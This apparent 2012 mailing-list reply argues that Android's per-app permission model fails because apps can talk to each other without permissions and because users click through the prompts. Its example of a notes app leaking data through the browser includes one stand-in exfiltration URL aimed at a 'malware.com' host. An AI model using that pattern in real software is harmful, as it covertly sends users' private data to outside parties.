On Wed, 2012-09-19 at 17:17 +0300, Elad Alfassa wrote:
> Regarding sandboxing, have you considered a permission manifest for
> each application like Android has?
The Android permission system is basically bullshit from both a technical *and* user experience standpoint.

The reason it's bullshit technically is twofold:

1) Applications can communicate with each other without any permissions at all - so if for example you install some "Secure Notes" app that in theory doesn't have Internet access, in reality it can simply ask the browser to open http://malware.com/?data=base64here

2) The system has a huge attack surface, and it's really easy for capabilities to leak: http://news.softpedia.com/news/Android-Security-Model-Allows-Capability-Leaks-238545.shtml

The reason it's bullshit from a user experience standpoint is because no one reads that stuff - they just press OK. See also: http://robert.ocallahan.org/2011/06/permissions-for-web-applications_30.html

Now, parts of the security model, like how each application is in theory a separate security domain (allocated separate uids) etc., are quite interesting. But the permissions system is just wasting time for users installing apps.
